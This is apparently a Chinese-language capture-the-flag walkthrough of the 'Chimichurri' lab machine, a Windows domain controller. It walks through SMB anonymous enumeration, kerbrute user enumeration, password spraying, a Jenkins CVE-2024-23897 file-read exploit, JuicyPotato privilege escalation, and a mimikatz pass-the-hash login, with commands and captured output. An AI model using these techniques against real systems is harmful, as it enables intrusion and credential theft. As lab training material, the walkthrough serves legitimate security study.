1.Chimichurri
1. 基本信息^toc
- 1. 基本信息
- 2. 信息收集
- 3. SMB空会话检测
- 4. rid-brute获取域内用户
- 5. ldap获取域内基础信息
- 6. kerbrute枚举出域内用户
- 7. 密码喷涂
- 8. Jenkins利用
- 9. 提权
- 10. 降权
靶机链接 thehackerslabs.com/chimichurri/
难度 ⭐️⭐️⭐️️
2. 信息收集
┌──(root㉿kali)-[~]
└─# fscan -h 192.168.200.4
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.200.4:88 open
192.168.200.4:139 open
192.168.200.4:135 open
192.168.200.4:445 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo
[*]192.168.200.4
[->]CHIMICHURRI
[->]192.168.200.4
[*] NetBios 192.168.200.4 [+] DC:CHIMICHURRI0\CHIMICHURRI
已完成 4/4
[*] 扫描结束,耗时: 1.070314445s
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# nmap -sC -sV 192.168.200.4
Nmap scan report for CHIMICHURRI0.local (192.168.200.4)
Host is up (0.00043s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-03 10:37:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: chimichurri.thl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: chimichurri.thl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
6969/tcp open http Jetty 10.0.11
|_http-title: Panel de control [Jenkins]
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.11)
MAC Address: 08:00:27:B8:51:4D (Oracle VirtualBox virtual NIC)
Service Info: Host: CHIMICHURRI; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-03T10:37:33
|_ start_date: 2024-12-03T10:04:56
|_nbstat: NetBIOS name: CHIMICHURRI, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b8:51:4d (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 5h59m57s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.34 seconds
域名 CHIMICHURRI0
配置一下 etc/hosts
192.168.200.4 chimichurri.thl
3. SMB空会话检测
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# smbmap -u anonymous -H 192.168.200.4
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.200.4:445 Name: chimichurri.thl Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
drogas READ ONLY
IPC$ READ ONLY IPC remota
NETLOGON NO ACCESS Recurso compartido del servidor de inicio de sesión
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
查看smb共享目录
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# smbclient -U '' //chimichurri.thl/drogas
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jun 27 18:20:49 2024
.. D 0 Thu Jun 27 18:20:49 2024
credenciales.txt A 95 Mon Jul 1 01:19:03 2024
7735807 blocks of size 4096. 4368462 blocks available
smb: \> get credenciales.txt
getting file \credenciales.txt of size 95 as credenciales.txt (46.4 KiloBytes/sec) (average 46.4 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# smbclient -U '' //chimichurri.thl/IPC$
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls -a
NT_STATUS_NO_SUCH_FILE listing \-a
smb: \> exit
查看文件内容
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# cat credenciales.txt
Todo es mejor en con el usuario hacker, en su escritorio estan sus claves de acceso como perico
这句西班牙语的意思是:
“所有事情都会更好,因为有黑客用户,他的桌子上有他的访问密钥,就像鹦鹉一样。”
其中“como perico”是个比喻,可能意味着“很显眼”或“随意放置”,暗示这些密钥没有被妥善保护。
4. rid-brute获取域内用户
因为存在 smb空会话 所以我们可以进行 rid-brute 获取域内用户
rid-brute只需要有一个域内合法用户即可进行。
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# crackmapexec smb chimichurri.thl -u 'guest ' -p ' ' --rid-brute
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# crackmapexec smb chimichurri.thl -u 'guest ' -p ' ' --rid-brute
SMB chimichurri.thl 445 CHIMICHURRI [*] Windows 10 / Server 2016 Build 14393 x64 (name:CHIMICHURRI) (domain:chimichurri.thl) (signing:True) (SMBv1:False)
SMB chimichurri.thl 445 CHIMICHURRI [+] chimichurri.thl\guest :
SMB chimichurri.thl 445 CHIMICHURRI [-] Error creating DCERPC connection: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
失败了。 这里对匿名用户的权限做了设置
5. ldap获取域内基础信息
ldapsearch -x -H ldap://192.168.200.4 -s 'base' namingcontexts
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# ldapsearch -x -H ldap://192.168.200.4 -s 'base' namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=chimichurri,DC=thl
namingContexts: CN=Configuration,DC=chimichurri,DC=thl
namingContexts: CN=Schema,CN=Configuration,DC=chimichurri,DC=thl
namingContexts: DC=DomainDnsZones,DC=chimichurri,DC=thl
namingContexts: DC=ForestDnsZones,DC=chimichurri,DC=thl
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
没啥有用的东西
6. kerbrute枚举出域内用户
我们目前需要一个可用的域用户。由于对匿名用户做了限制不让进行 rid-brute 直接获取域内用户。 那只能尝试爆破枚举了
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# kerbrute userenum -d chimichurri.thl -t 100 --dc 192.168.200.4 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/03/24 - Ronnie Flathers @ropnop
2024/12/03 12:49:28 > Using KDC(s):
2024/12/03 12:49:28 > 192.168.200.4:88
2024/12/03 12:49:28 > [+] VALID USERNAME: hacker@chimichurri.thl
2024/12/03 12:49:28 > [+] VALID USERNAME: Hacker@chimichurri.thl
2024/12/03 12:49:33 > [+] VALID USERNAME: invitado@chimichurri.thl
2024/12/03 12:49:47 > [+] VALID USERNAME: administrador@chimichurri.thl
2024/12/03 12:49:48 > [+] VALID USERNAME: HACKER@chimichurri.thl
2024/12/03 12:54:16 > Done! Tested 8295455 usernames (5 valid) in 288.265 seconds
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# awk '{print $7}' valid_user.txt | sed 's/@.*//' >kerber_brute_users.txt
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# cat kerber_brute_users.txt
hacker
Hacker
invitado
administrador
HACKER
尝试利用这些用户的名字作为密码进行爆破
7. 密码喷涂
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# crackmapexec smb chimichurri.thl -u kerber_brute_users.txt -p kerber_brute_users.txt --no-bruteforce --continue-on-success
SMB chimichurri.thl 445 CHIMICHURRI [*] Windows 10 / Server 2016 Build 14393 x64 (name:CHIMICHURRI) (domain:chimichurri.thl) (signing:True) (SMBv1:False)
SMB chimichurri.thl 445 CHIMICHURRI [-] chimichurri.thl\hacker:hacker STATUS_LOGON_FAILURE
SMB chimichurri.thl 445 CHIMICHURRI [-] chimichurri.thl\Hacker:Hacker STATUS_LOGON_FAILURE
SMB chimichurri.thl 445 CHIMICHURRI [-] chimichurri.thl\invitado:invitado STATUS_LOGON_FAILURE
SMB chimichurri.thl 445 CHIMICHURRI [-] chimichurri.thl\administrador:administrador STATUS_LOGON_FAILURE
SMB chimichurri.thl 445 CHIMICHURRI [-] chimichurri.thl\HACKER:HACKER STATUS_LOGON_FAILURE
看来不存在将用户名作为密码的用户
8. Jenkins利用
观察nmap的结果可以发现靶机是开放了Jenkins的
6969/tcp open http Jetty 10.0.11
|_http-title: Panel de control [Jenkins]
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.11)
MAC Address: 08:00:27:B8:51:4D (Oracle VirtualBox virtual NIC)
Service Info: Host: CHIMICHURRI; OS: Windows; CPE: cpe:/o:microsoft:windows
jenkins是有很多漏洞的
先去找一个最新的试试
https://www.exploit-db.com/
试试这个LFI (CVE-2024-23897)
之前的 credenciales.txt 提示我们在 hacker 用户的桌面有一个凭证
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# cat credenciales.txt
Todo es mejor en con el usuario hacker, en su escritorio estan sus claves de acceso como perico
这句西班牙语的意思是:
“所有事情都会更好,因为有黑客用户,他的桌子上有他的访问密钥,就像鹦鹉一样。”
其中“como perico”是个比喻,可能意味着“很显眼”或“随意放置”,暗示这些密钥没有被妥善保护。
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# python3 51993.py -u http://192.168.200.4:6969
Press Ctrl+C to exit
File to download:
> /users/hacker/desktop/perico.txt
hacker:Perico69
成功获取 hacker 用户的密码
尝试看能不能登录
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# evil-winrm -i 192.168.200.4 -u hacker -p Perico69
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\hacker\Documents>
成功登录
9. 提权
先看一下当前用户的权限
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= ============================================ ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeImpersonatePrivilege Suplantar a un cliente tras la autenticaci¢n Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
SeImpersonatePrivilege 权限允许我们利用别人的用户权限进行命令执行
可以传一个 RunasCS 进行利用。也可以用传土豆进行提权
但 RunasCS 需要另一个用户的账号密码 所以这里排除使用这个
这里我都不选。我用cs提权
传一个cs后门运行,上线
选择Juicypotato提权
成功提取到系统
这里还有个问题。获取到了系统权限还不让我看flag,只给管理员权限的用户看看
10. 降权
这里需要降权。系统权限降权到管理员很简单、
在cs里面 可以使用进程注入 或者令牌窃取
这里我采用直接mimikatz抓管理员hash用管理员登录
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# evil-winrm -i 192.168.200.4 -u Administrador -H 058a4c99bab8b3d04a6bd959f95ce2b2
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrador\Documents> whoami
chimichurri0\administrador
*Evil-WinRM* PS C:\Users\Administrador\Documents> type c:\users\administrador\desktop\root.txt
hjafcdv8a75e3cvsdfg6asd4f9vbsf9sa
*Evil-WinRM* PS C:\Users\Administrador\Documents> type c:\users\hacker\desktop\user.txt
acrsgvs6edr8f5vaw9a8eadv6fa9b
注意这比西班牙语的管理员名字与英语的管理员有区别